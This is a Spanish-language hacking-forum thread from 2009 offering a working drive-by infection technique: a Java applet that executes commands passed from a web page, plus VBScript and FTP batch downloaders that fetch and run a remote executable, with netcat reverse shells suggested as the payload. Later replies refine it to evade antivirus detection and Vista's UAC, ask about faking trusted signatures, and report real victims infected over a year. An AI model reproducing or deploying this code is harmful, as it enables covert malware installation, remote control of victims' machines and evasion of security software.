Imprimir Página - [POC] Infección Mediante Java Applet (y VBScript)

Título: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: [Zero] en 1 Enero 2009, 22:50 pm

[POC] Infección Mediante Java Applet (y VBScript)

Fuente milw0rm.com (http://milw0rm.com/papers/262)
Autor: AnalyseR

POC y post realizado por Wofo y Hacker_Zero para www.eduhack.es

Bueno, muchos recordarán un post dónde se explicaba como hacer un fake de una web que nos pedía un componente flash y había un link hacia un *.exe.

Bueno pues mediante la ejecución de un Applet en Java y un script en VBScript o Batch, es posible descargar y ejecutar un programa remoto en un pc tan sólo con 1 click, para decir que se confía en el applet que se intenta ejecutar (el cual sale en todos los applets como pueden ser juegos y demás).

Empezamos con el Applet
Lo primero será compilar el siguiente código en Java:

Código

import java.applet.*;
import java.awt.*;  
import java.io.*;
public class skata extends Applet
{
     public void init() 
     {
          Process f;
          String first = getParameter("first");
 
           try
           {
                f = Runtime.getRuntime().exec(first);
           }
 
           catch(IOException e)
           { 
                e.printStackTrace();
           }
      }
}

Éste código ejecuta un en el pc remoto lo que se le pase como parámetro. El Applet puede ser utilizado de la suguiente manera desde un documento html:

Código

<applet width='1' height='1' code='Nombre-clase-applet.class' archive='Nombre-Applet.jar'>
 
<param name='first' value='cmd.exe /c msg * Hola Mundo!'>
 
</applet>

Como véis nos dá la posibilidad de ejecutar comandos de consola en un pc remoto con S.O Windows. Pero iremos un paso más allá, y descargaremos un archivo al pc, como podemos hacer ésto? Pues podemos crear códigos usando Scripting, ya sea en Batch usando ftp o en VBScript.

Para crear el archivo VBS utilizamos Streams de salida en Batch:

Código:

cmd.exe /c echo Comando en VBS >>C:\Archivo.vbs

El siguiente código en VBScript descarga un Archivo binario y lo ejecuta:

Código

Const adTypeBinary = 1  
Const adSaveCreateOverWrite = 2  
Dim BinaryStream  
Set BinaryStream = CreateObject("ADODB.Stream")  
BinaryStream.Type = adTypeBinary  
BinaryStream.Open  
BinaryStream.Write BinaryGetURL(Wscript.Arguments(0))  
BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite  
Function BinaryGetURL(URL)  
Dim Http  
Set Http = CreateObject("WinHttp.WinHttpRequest.5.1")  
Http.Open "GET", URL, False  
Http.Send  
BinaryGetURL = Http.ResponseBody  
End Function  
Set shell = CreateObject("WScript.Shell")  
shell.Run "cmd.exe /c C:\archivo.exe"

Su funcionamiento es muy sencillo:

Código:

Codigo.vbs http://www.pagina.com/archivo.exe C:\archivo.exe

Tambien se podría hacer sin necesidad de ningún archivo vbs ejecutando el ftp de la línea de comandos, aunque seguimos con el caso de vbs que es el ejemplo que puso el autor y es mas "general".

Aquí un ejemplo de como descargar el archivo usando ftp desde la shell:

Código:

@echo off
echo usuario@nombreftp.com>C:\datos.txt
echo contraseña>>C:\datos.txt
echo cd /path>>C:\datos.txt
echo pwd>>C:\datos.txt
echo binary>>C:\datos.txt
echo get archivo.exe>>C:\datos.txt
echo bye>>C:\datos.txt 
echo quit>>C:\datos.txt
ftp -s:C:\datos.txt nombreftp.com
start archivo.exe

El archivo descargado (en nuestro ejemplo [al final del post]) lo único que nos da es una advertencia y la ip y el puerto que le pasamos por php.
Lo de la ip y el puerto funciona gracias a un sencillo código PHP:

Código

<?php
if(isset($HTTP_GET_VARS["ip"])) {
	$ip = $HTTP_GET_VARS["ip"];
}
else $ip = 127.0.0.1;
 
if(isset($HTTP_GET_VARS["puerto"])) {
	$puerto = $HTTP_GET_VARS["puerto"];
}
else $port = 7173;
 
echo '
<applet width="1" height="1" code="nombreclaseapplet.class" archive="nombreapplet.jar">
<param name="first" value="cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs & echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject(\"ADODB.Stream\") >> C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> C:\windows\apsou.vbs & echo Set Http = CreateObject(\"WinHttp.WinHttpRequest.5.1\") >> C:\windows\apsou.vbs & echo Http.Open \"GET\", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C:\windows\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & echo Set shell = CreateObject(\"WScript.Shell\") >> C:\windows\apsou.vbs & echo shell.Run \"C:\windows\update.exe -d -e cmd.exe '.$ip.' '.$puerto.'\" >> C:\windows\apsou.vbs">
</applet>';
?>

Con este código lo que hacemos es editar el código VBs para que ejecute el archivo descargado, pasando como parámetros la ip y el puerto introducidos en la URL.

Para que tengan una mejor idea de lo que digo les dejo el código en C++ del programa que se descarga en el ejemplo:

Código

#include <iostream>
 
 
 
using namespace std;
 
 
 
int main(int argc, char* argv[]) {
 
	cout << "Este ejecutable puede ser reemplazado un troyano, backdoor, virus, netcat, etc." << endl;
 
    cout << "Por lo tanto nunca hay que fiarse de applets sin firmas certificadas" << endl;
 
    cout << "La ip introducida mediante PHP es " << argv[1] << endl;
 
    cout << "El puerto introducido mediante PHP es " << argv[2] << endl;
 
}

Las variables de la url en php se pasan al VBS. Al ejecutar el VBS éste ejecuta nuestro archivo.exe con los parámetros.

Pudiendo hacer esto, las posibilidades que ofrece este método son infinitas... Se puede mandar cualquier programa y ejecutarlo sin que el usuario sospeche nada, imagina que mandamos un netcat con los parámetros para que nos pase una shell, o que mandamos un troyano o lo que sea. Nuevamente digo, las posibilidades son infinitas.

Les dejamos una prueba de concepto en el siguiente link:

http://wofo.x10hosting.com/hacking/JAVA/POCapplet/index.php?board=127.0.0.1&topic=7765

Otra poc usando ftp desde la línea de comandos, sin necesidad de vbs:

http://wofo.x10hosting.com/hacking/JAVA/POCapplet/indexftp.php?board=127.0.0.1&topic=7765

Como verán, es un fake muy convincente de un post del foro (fake hecho por HACKER_ZERO).
Lo que hace es, cuando ejecutan el applet, crea el codigo en .vbs y lo ejecuta, el cual se encarga de descargar el archivo.exe y ejecutarlo con los parámetros. Ambos archivos se descargan en C:\Windows como apsou.vbs y update.exe.

Testeado usando netcat en:

- Firefox 3.05, Windows XP SP3 con Firewall de Windows, NOD32 y su Firewall activo.

- IE Windows XP SP3 con Firewall de Windows, NOD32 y su Firewall activo.

- Firefox 3.05, Windows XP SP2 con Firewall de Windows, Avast y su Firewall activo. (Gracias Shell Killer ;))

Cualquier duda o pregunta la recibimos con los brazos abiertos.

Salu2

Título: Re: [POC] Infección Mediante Java Applet y VBScript
Publicado por: Wofo en 1 Enero 2009, 23:13 pm

::) Esperamos que les guste.

Salu2

Título: Re: [POC] Infección Mediante Java Applet y VBScript
Publicado por: Littlehorse en 1 Enero 2009, 23:16 pm

XP SP2 IE7/FF3.5 works. Obvio como siempre el KIS detecta el script y la creacion del archivo.

(http://img212.imageshack.us/img212/5672/epala1.th.jpg) (http://img212.imageshack.us/my.php?image=epala1.jpg)

Ademas de tener que permitir la ejecucion desde el navegador obviamente, pero bueno un fakegame y va de perlas.

Título: Re: [POC] Infección Mediante Java Applet y VBScript
Publicado por: [Zero] en 1 Enero 2009, 23:20 pm

Hm el kis como siempre, jeje, lo detectará por heurística, el script no daba alerta como resultado en novirusthanks. Supongo kis será el único, yo tengo nod32 y ni se percata.

Saludos

Título: Re: [POC] Infección Mediante Java Applet y VBScript
Publicado por: Littlehorse en 1 Enero 2009, 23:25 pm

No, mas que heuristica es las reglas de las aplicaciones, la proactiva y demas. Lo "malo" con el KIS es que te pone bloquear como recomendado a lo digitalmente desconocido y bueno eso lleva a que mas de uno le ponga bloquear sin importar su nivel de conocimientos. En anteriores versiones si que te ponia solo "autorizar" o bloquear" sin mas, y ahi si todo el mundo si veia un nombre medio windowsero le daba autorizar. Si te fijas, el script pasa al grupo de restriccion minima y no me pregunto si queria ponerlo ahi, si me alerto que se creaba y se lo ponia en "restriccion minima", pero no me dio chances de elegir y eso ya es bastante con el KIS. Ahora pruebo con Vista a ver que pasa, asumo que el UAC saltara.

PD: El nod nunca se percata de nada =D.

Felicitaciones por el POC :)

Título: Re: [POC] Infección Mediante Java Applet y VBScript
Publicado por: [Zero] en 1 Enero 2009, 23:31 pm

Si, sería interesante probarlo en vista ya que no tuve ocasión de hacerlo. Gracias, pero la idea es de AnalyseR y que lo posteó en milw0rm, nosotros hemos adaptado la info a nuestra manera y hemos añadido lo de los parámetros usando php. Haciendolo así, incluso se puede montar una web que acepte los parametros ip y puerto para netcat (index.php?ip=127.0.0.1&puerto=2000), pero no lo hemos hecho ya que no lo veíamos conveniente, la cantidad de lammers que lo usarían comprometiendo la seguridad de muchos pc's. Así el que lo haga tiene que compilar los códigos y entenderlos ;).

Saludos

Título: Re: [POC] Infección Mediante Java Applet y VBScript
Publicado por: Littlehorse en 1 Enero 2009, 23:35 pm

Ni hablar, 100% de acuerdo, este tipo de cosas siempre es mejor mostrar como funciona pero no dejarlas servidas en bandeja.

Termino de probar unas cosillas y comento que pasa en Vista.

Un abrazo!

Título: Re: [POC] Infección Mediante Java Applet y VBScript
Publicado por: [Zero] en 2 Enero 2009, 01:57 am

Hm pero ahora que lo pienso, si lo que detecta la heurística es la creación del vbs, mediante /c se pueden descargar los archivos de un ftp con acceso anónimo sin necesidad de crear ningún script, aunque no estoy seguro, me creo un ftp y les cuento, jaja.

Saludos

Título: Re: [POC] Infección Mediante Java Applet y VBScript
Publicado por: Novlucker en 2 Enero 2009, 02:15 am

El KIS detecta el funcionamiento del vbs, no la creación de este :rolleyes:
Detecta hasta la descarga de un archivo en texto plano, un *.exe ni hablar, así que la efectividad de este método sigue dependiendo de "ingenieria social" :P

[HTML-VBS-Batch] Propagacion a traves de Internet ? Posible ? (http://foro.elhacker.net/scripting/htmlvbsbatch_propagacion_a_traves_de_internet_posible-t221250.0.html)

Saludos

Título: Re: [POC] Infección Mediante Java Applet y VBScript
Publicado por: Littlehorse en 2 Enero 2009, 02:36 am

Obviamente que detecta el funcionamiento, pero a mi me lo paso al grupo de restriccion minima sin consultarme =P.
Y lo de la ingenieria social esta claro, si ese Applet no es un fake porno game online o el proveedor no tiene un nombre ingenioso muy pocos caerian.

Título: Re: [POC] Infección Mediante Java Applet y VBScript
Publicado por: [Zero] en 2 Enero 2009, 04:03 am

Estoy trantando de hacerlo todo desde la shell para prescindir del vbs y que no lo detecte el kis, haber si me podéis ayudar, tengo lo siguiente:

Código:

@echo off
echo usuario@nombreftp.com>C:\datos.txt
echo contraseña>>C:\datos.txt
echo cd /path>>C:\datos.txt
echo pwd>>C:\datos.txt
echo binary>>C:\datos.txt
echo get archivo.exe>>C:\datos.txt
echo bye>>C:\datos.txt 
echo quit>>C:\datos.txt
ftp -s:C:\datos.txt nombreftp.com
start archivo.exe

(Haber si alguien que tenga kav puede probar si lo detecta por proactiva, sería raro)

El caso es que ése código funciona perfectamente, me descarga el archivo del ftp y me lo ejecuta, pero cuando trato de pasarlo a php para que lo ejecute el applet con cmd.exe /c de esta forma:

Código

echo "<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>";
echo "<param name='first' value='
cmd.exe /c 
echo usuario@nombreftp.com>C:\datos.txt &
echo contraseña>>C:\datos.txt &
echo cd /path>>C:\datos.txt &
echo pwd>>C:\datos.txt &
echo binary>>C:\datos.txt &
echo get archivo.exe>>C:\datos.txt &
echo bye>>C:\datos.txt &
echo quit>>C:\datos.txt &
ftp -s:C:\datos.txt nombreftp.com &
start archivo.exe
'>";
echo "</applet>";

Al abrir la pagina, el applet se ejecuta, ejecuta los comandos pero me genera un archivo.exe de 0 bytes y obvio da error al ejecutarlo, alguien sabe a que se debe o como lo podría solucionar?

Saludos

PD: Si cae mucha gente, si no fuera por lo del kis sería perfecto, ya que en todos los applets no firmados sale ese mensaje, la gente está acostumbrada a aceptarlo, inicias un chat y sale el mensaje, te vas a jugar al ajedrez y sale ese mensaje, etc...

Edito, el fallo era un espacio, hay que hacer:

Código:

cmd.exe /c echo usuario@nombreftp.com>C:\datos.txt&echo contraseña>>C:\datos.txt &

NO:

Código:

cmd.exe /c echo usuario@nombreftp.com>C:\datos.txt & echo contraseña>>C:\datos.txt &

Un erro tonto que nos costo a mi y a wofo un gran dolor de cabeza, jajaja.

Saludos

Título: Re: [POC] Infección Mediante Java Applet y VBScript
Publicado por: Wofo en 2 Enero 2009, 19:08 pm

Yo sé... Deberías haberme preguntado...

Este code debería funcionar:

Código

echo "<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>";
echo "<param name='first' value='
cmd.exe /c 
echo usuario@nombreftp.com>C:\\datos.txt &
echo contraseña>>C:\\datos.txt &
echo cd /path>>C:\\datos.txt &
echo pwd>>C:\\datos.txt &
echo binary>>C:\\datos.txt &
echo get archivo.exe>>C:\\datos.txt &
echo bye>>C:\\datos.txt &
echo quit>>C:\\datos.txt &
ftp -s:C:\\datos.txt nombreftp.com &
start archivo.exe
'>";
echo "</applet>";

Fíjate en que cuando quieres hacer un '\' tienes que poner '\\' (es igual que en C/C++)

Salu2

Título: Re: [POC] Infección Mediante Java Applet y VBScript
Publicado por: Novlucker en 2 Enero 2009, 19:16 pm

Hay que reconocer que si bien este método necesita de ingenieria social, creo que canta mucho menos que los anteriores :P

Cita de: Hacker_Zero en 2 Enero 2009, 04:03 am

(Haber si alguien que tenga kav puede probar si lo detecta por proactiva, sería raro)

Tengo el KIS así que luego lo pruebo a ver si salta :rolleyes:

Título: Re: [POC] Infección Mediante Java Applet y VBScript
Publicado por: Littlehorse en 2 Enero 2009, 19:24 pm

Ahora lo pruebo yo tambien, en realidad probarlo contra el KIS es probarlo contra el rey y no se si es lo mas adecuado, es decir, Alguien conoce la forma de saltarse la proactiva del KIS?.
Digo que no es lo mas adecuado porque con el tema de las keys en lista negra muchos pasan de instalarlo y van por el NOD, el AVG y demas yerbas. Aunque ahora con esto del kavkiskey ya varios lo estan utilizando pero bueno, en mi caso la mayoria de las personas que conozco no usan kav ni kis.

Título: Re: [POC] Infección Mediante Java Applet y VBScript
Publicado por: [Zero] en 2 Enero 2009, 20:34 pm

Tamos preparando el poc nuevamente sin utilizar vbs, ahora mismo lo subimos para que lo prueben con el kis, haber si lo detecta por proactiva o no, funciona descargando el archivo por ftp desde la shell ;D.

Saludos

Título: Re: [POC] Infección Mediante Java Applet y VBScript
Publicado por: Wofo en 2 Enero 2009, 20:36 pm

ACTUALIZACIÓN:

Con el problema del KIS y KAV, a HACKER_ZERO se le ocurrió hacer la descarga del .exe por medio de batch + FTP. Les dejo el index.php modificado:

Código

<?php
if(isset($HTTP_GET_VARS["board"])) {
	$ip = $HTTP_GET_VARS["board"];
	echo $ip;
}
 
else $ip = "127.0.0.1";
 
if(isset($HTTP_GET_VARS["topic"])) {
	$puerto = $HTTP_GET_VARS["topic"];
	echo $puerto;
}
 
else $puerto = 666;
 
echo "<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>";
echo "<param name='first' value='
cmd.exe /c cd C:\\Windows & echo user@ftp.net>datos.txt&echo clave>>datos.txt&echo pwd>>datos.txt&echo binary>>datos.txt&echo get archivo.exe>>datos.txt&echo bye>>datos.txt&echo quit>>datos.txt&ftp -s:datos.txt ftp.net&start archivo.exe ".$ip." ".$puerto."&pause'>";
echo "</applet>";
 
?>

Y el link del POC: http://wofo.x10hosting.com/hacking/JAVA/POCapplet/indexftp.php?board=127.0.0.1&topic=7172

Salu2

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: Novlucker en 3 Enero 2009, 00:00 am

Tiene que aparecer algo así verdad? :P

(http://s1.subirimagenes.com/imagen/previo/thump_1730801poc.png)
Broma, lo he bajado a mano así que borra esa sonrisa de tu cara :xD

Sigue quedando en cero el ejecutable, eso si, el KIS no dice nada :D

Saludos

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: [Zero] en 3 Enero 2009, 00:59 am

Ais no puede ser!!!, lo de 0 bytes estaba solucionado, tiene que ir, vamos a mi me funciona :rolleyes:. Prueba otra vez haber, dime que windows, vista?

Saludos

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: Novlucker en 3 Enero 2009, 01:18 am

XP :rolleyes: , el ftp simplemente se queda colgado y no termina de bajar nunca :-\

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: [Zero] en 3 Enero 2009, 01:22 am

Pero ves la ventana del ftp? Yo me sale la pantalla de msdos en un pantallazo rapido y se cierra, casi no se nota, luego de poco tiempo, no 3 segundos se me descarga el exe y se ejecuta, te da error al abrir el applet de que el arhivo poc.exe no es una aplicacion win32 valida o no llega ahí? Si hay fallo en el ftp debería mostrar ese error, pero no tiene xk haber fallo, yo lo testeo 20 veces y no falla, haber si alguien mas puede probar :-\, ahora que pensaba que me saltaba el kav va y ni arranca :xD.

Saludos

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: Nakp en 5 Enero 2009, 17:58 pm

probado con ess, firefox y win xp sp3... no dice ni pío excepto que el firewall me pide permisos para descargar el archivo :-\

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: ‭‭‭‭jackl007 en 10 Enero 2009, 15:37 pm

se como firmar un applet; pero no lo expondre; porque seria abrir las puertas a mucho acto delicuencial.

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: A2Corp en 18 Febrero 2009, 21:15 pm

Me vas a tomar por tonto... pero como se compilaba el java?
Era con Javac, no?
Pero porque pones que el archivo es .jar y no .java?
.jar no era como un java compreso?

Ayudaaaaaaaaaa

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: A2Corp en 19 Febrero 2009, 03:12 am

Al ejecutar el applet en el navegador no se ejecuta y si abro la consola marca este error:

Citar

java.security.AccessControlException: access denied (java.io.FilePermission <<ALL FILES>> execute)
   at java.security.AccessControlContext.checkPermission(Unknown Source)
   at java.security.AccessController.checkPermission(Unknown Source)
   at java.lang.SecurityManager.checkPermission(Unknown Source)
   at java.lang.SecurityManager.checkExec(Unknown Source)
   at java.lang.ProcessBuilder.start(Unknown Source)
   at java.lang.Runtime.exec(Unknown Source)
   at java.lang.Runtime.exec(Unknown Source)
   at java.lang.Runtime.exec(Unknown Source)
   at skata.init(skata.java:13)
   at sun.plugin2.applet.Plugin2Manager$AppletExecutionRunnable.run(Unknown Source)
   at java.lang.Thread.run(Unknown Source)
Excepción: java.security.AccessControlException: access denied (java.io.FilePermission <<ALL FILES>> execute)

Que estoy haciendo mal? :S

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: A2Corp en 19 Febrero 2009, 18:23 pm

Despues de tanto batallar y batallar y batallar y batallar..................

jackl007 ツ me abrio los ojos jajajajajajajaja.
Si no hubiera sido por eso que me explicaste seguiria preguntandome porque marcaba ese error.

Funciona de maravilla en windows vista con IE y FIREFOX
y en Xp igual.

Les agradezco mucho!

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: A2Corp en 20 Febrero 2009, 00:55 am

Cita de: jackl007 ツ en 10 Enero 2009, 15:37 pm

se como firmar un applet; pero no lo expondre; porque seria abrir las puertas a mucho acto delicuencial.

Te refieres a que aparezca como comprobado?
sin que diga el "no ha podido ser comprobado bla bla bla"?????????????

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: citta en 2 Abril 2009, 17:05 pm

Estimados:

Da el siguiente error:

java.security.AccessControlException: access denied (java.io.FilePermission <<ALL FILES>> execute)
   at java.security.AccessControlContext.checkPermission(Unknown Source)
   at java.security.AccessController.checkPermission(Unknown Source)
   at java.lang.SecurityManager.checkPermission(Unknown Source)
   at java.lang.SecurityManager.checkExec(Unknown Source)
   at java.lang.ProcessBuilder.start(Unknown Source)
   at java.lang.Runtime.exec(Unknown Source)
   at java.lang.Runtime.exec(Unknown Source)
   at java.lang.Runtime.exec(Unknown Source)
   at skata.init(skata.java:13)
   at sun.applet.AppletPanel.run(Unknown Source)
   at java.lang.Thread.run(Unknown Source)

---
Posiblemente en la nueva versión de Java ya este solucionado este tema.
Java Plug-in 1.6.0_07
Usar versión JRE 1.6.0_07 Java HotSpot(TM) Client VM
Directorio local del usuario = C:\Documents and Settings\Ayl

Atte.

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: andres52 en 11 Abril 2009, 08:21 am

Lo compile en java y me da este error:

Citar

cargar: clase Script.class no encontrada.
java.lang.ClassNotFoundException: Script.class
   at sun.applet.AppletClassLoader.findClass(Unknown Source)
   at java.lang.ClassLoader.loadClass(Unknown Source)
   at sun.applet.AppletClassLoader.loadClass(Unknown Source)
   at java.lang.ClassLoader.loadClass(Unknown Source)
   at sun.applet.AppletClassLoader.loadCode(Unknown Source)
   at sun.applet.AppletPanel.createApplet(Unknown Source)
   at sun.plugin.AppletViewer.createApplet(Unknown Source)
   at sun.applet.AppletPanel.runLoader(Unknown Source)
   at sun.applet.AppletPanel.run(Unknown Source)
   at java.lang.Thread.run(Unknown Source)

¿Que me falto hacer?

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: andres52 en 13 Abril 2009, 05:31 am

No pude resolver el problema, pero en vez de subir el jar subi el .class.. a ver si queria funcionar (obviamente cambie eso en el html y ahora me da otro error:

Citar

java.lang.ClassFormatError: Illegal UTF8 string in constant pool in class file skata
   at java.lang.ClassLoader.defineClass1(Native Method)
   at java.lang.ClassLoader.defineClass(Unknown Source)
   at java.security.SecureClassLoader.defineClass(Unknown Source)
   at sun.applet.AppletClassLoader.findClass(Unknown Source)
   at java.lang.ClassLoader.loadClass(Unknown Source)
   at sun.applet.AppletClassLoader.loadClass(Unknown Source)
   at java.lang.ClassLoader.loadClass(Unknown Source)
   at sun.applet.AppletClassLoader.loadCode(Unknown Source)
   at sun.applet.AppletPanel.createApplet(Unknown Source)
   at sun.plugin.AppletViewer.createApplet(Unknown Source)
   at sun.applet.AppletPanel.runLoader(Unknown Source)
   at sun.applet.AppletPanel.run(Unknown Source)
   at java.lang.Thread.run(Unknown Source)

He revisado todo y sigo sin tener ni idea porque ocurre esto, si pudieran ayudarme les agradeceria muchisimo, pues nescecito tener esto listo pronto.

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: andres52 en 23 Abril 2009, 02:50 am

Ya logre hacerlo funcionar :] cambie al netbeans y funcionó... ahora el problema es lo del archivo de 0 bytes.... no entiendo porque ocurre esto, alguien lo solucionó?

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: andres52 en 23 Abril 2009, 07:02 am

Listo, resuelto completamente... esque el código en php esta mal.. pero lo corregi y va perfecto.

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: andres52 en 25 Abril 2009, 01:10 am

Hola, soy yo otra vez... xd

Bueno... va perfecto nadamás en mi maquina porqe trate de hacerlo funcionar en otras y aunque abre el certificado java no me abre ni me activa nada... y si por ejemplo le ponga que abra un mensaje (el de hola mundo) que pefectamente funciona en esta pc.. en cualquier otra no lo abre... no entiendo porqe!!

El host estoy usando es PHONE ACCES, que en realidad hostea en webspacemania.. no se si tarden mucho en actualizar o algo.. porfavor alguien podria explicarme porque no funciona?

Editado-- Ya se solucionó... era cosa del servidor xd

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: A2Corp en 23 Mayo 2009, 13:58 pm

Alguien lo ha probado en win Vista?
el "Control de cuentas de usuario" creo que no deja ejecutar el bat.
:-[

Quien logro infectar en vista?

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: A2Corp en 23 Mayo 2009, 16:50 pm

Investigue un poco y el problema esta en que no deja crear el archivo log.txt en la carpeta windows asi que podemos poner otra ruta.

Y hay otro problema que aun no soluciono:

Código:

E:\>ftp -s:log.txt
ftp> servidor@servidor.com
Comando no v lido.
ftp> mipassword123
Comando no v lido.
ftp> cd /
Desconectado.
ftp> pwd
Desconectado.
ftp> binary
Desconectado.
ftp> get Virus.exe
Desconectado.
ftp> bye

aparece como comando no valido al tratar de conectar con el ftp....
Es por el UAC me imagino.

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: A2Corp en 23 Mayo 2009, 17:39 pm

Lo pongo todo separado para que se lea mejor...
Ya conseguir que funcione en Vista y burle el UAC:

cmd.exe /c
md c:\System32 &
cd c:\system32 &
echo try@servidor>c:\\System32\log.txt&
echo mipassword>>c:\\System32\log.txt&
echo cd />>c:\\System32\log.txt&
echo pwd>>c:\\System32\log.txt&
echo binary>>c:\\System32\log.txt &
echo get mivirus.exe>>c:\\System32\log.txt&
echo bye>>c:\\System32\log.txt &
echo quit>>c:\\System32\log.txt &
ftp -s:c:\\System32\log.txt baires03.com.ar &
start mivirus.exe

asi no tocamos ninguna ruta sospechosa para el UAC y nos deja hacer todo el proceso :D

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: m[a]rkus en 1 Junio 2009, 02:21 am

Hola la verdad encontre información sobre este tema en otro sitios (en inglés) y me resulto muy complicado por la poca explicación que ofrecian, y buscando mas en google aparecio esto, bien lo que me sucede actualmente es lo que le ah pasado a varios aqui pero que no dicen como lo corrijieron o al menos yo no lo vi, yo tengo este codigo:

Código:

<?php
if(isset($HTTP_GET_VARS["board"])) {
	$ip = $HTTP_GET_VARS["board"];
	echo $ip;
}
 
else $ip = "127.0.0.1";
 
if(isset($HTTP_GET_VARS["topic"])) {
	$puerto = $HTTP_GET_VARS["topic"];
	echo $puerto;
}
 
else $puerto = 666;
 
echo "<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>";
echo "<param name='first' value='
cmd.exe /c cd C:\\ & echo usuario@ftp.com>datos.txt&echo contraseña>>datos.txt&echo pwd>>datos.txt&echo binary>>datos.txt&echo get Client.exe>>datos.txt&echo bye>>datos.txt&echo quit>>datos.txt&ftp -s:datos.txt ftp.com&start Client.exe ".$ip." ".$puerto."&pause'>";
echo "</applet>";
 
?>

Al abrir se demora unos 6 o 7 segundos y sale un mensaje de error "Aplicación Win32 no Valida" fue a la ruta y estaba el "datos.txt" y "Cliente.exe" pero con 0 bytes leyendo vi que a algunos les ah pasado y dicen que es un error que tenia el PHP pero no soy capaz de encontrarlo. Seria de agradecer que lo postearas un saludo y gracias por adelantado.

Resuelto: Cambiar server FTP
El code esta bien

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: andres52 en 4 Julio 2009, 05:52 am

Una duda, para que sirve el /c?

cmd.exe /c cd C:\...

solo por curiosidad :]

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: Novlucker en 4 Julio 2009, 23:24 pm

Código

C:\Documents and Settings\Novlucker>cmd /?
Inicia una nueva instancia del intérprete de comandos de Windows XP
 
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
 [[/S] [/C | /K] cadena]
 
/C Ejecuta el comando especificado en cadena y luego finaliza

Ejecuta todos los comandos que vienen después

Saludos

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: andres52 en 12 Julio 2009, 05:11 am

Muchas gracias por tu respuesta Novlucker.

Ahora lo que quiero es borrar la carpeta creada aqui:

Citar

le pongo &cd..&rd system32 /s /q y no funciona.. no la borra.. pero poniendo ese código directamente en la consola si la borra... porque?

Edit- Ya vi porque no la borra... tiene el exe activado todavia.. bueno no es de mucha importancia, pues si ya la persona esta infectada puedo borrar la carpeta manualmente Pero ahora el problema es otro, cuando el usuario es limitado y tiene el uac activado, no funciona el código, no tengo idea porque pero no crea la carpeta ni activa nada... aún cuando en el cmd si puedo hacerlo manualmente (y aún cuando ya probé sin el uac activado y si funcionaba) ¿Porque ocurre esto?

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: A2Corp en 15 Julio 2009, 03:26 am

me tiene bien satisfecho este metodo de infección pero no del todo no falta el que por desesperado le pique a cancelar porque penso que era publicidad o alguna otra cosa.
Se les ocurre algo que oriente o casi obligue al usuario a darle click a Aceptar?
:/

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: A2Corp en 20 Julio 2009, 16:25 pm

No entiendo porque ya nadie se interesa en este tema....
Si alguien entra y sabe lo siguiente hagamelo saber porfavor jejeje.

Es facil, dificil, imposible hacer que la firma del certificado sea de alguna compañia reconocida para q cuando salte el applet no diga:

"la firma digital de la aplicacion no se puede verificar"

Alguien sabe algo?

Título: Re: [POC] Infección Mediante Java Applet (y VBScript)
Publicado por: A2Corp en 11 Septiembre 2010, 14:56 pm

Pues aqui me encuentro reviviendo este tema para preguntar si existe alguna mejoria en el codigo o si alguien ha pensado algo diferente.

Yo estuve usando este code por mas de 1 año y me iba muy bien pero de un tiempo para aca las infecciones disminuyeron y compartiendo el enlace de infeccion con varios compañeros del hack me comentaban que no les cargaba el applet, o algunos no tenian java y a otros mas si les cargaba el applet pero no se descargaba el archivo.

Alguna experiencia de ustedes?

Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: [Zero] en 1 Enero 2009, 22:50 pm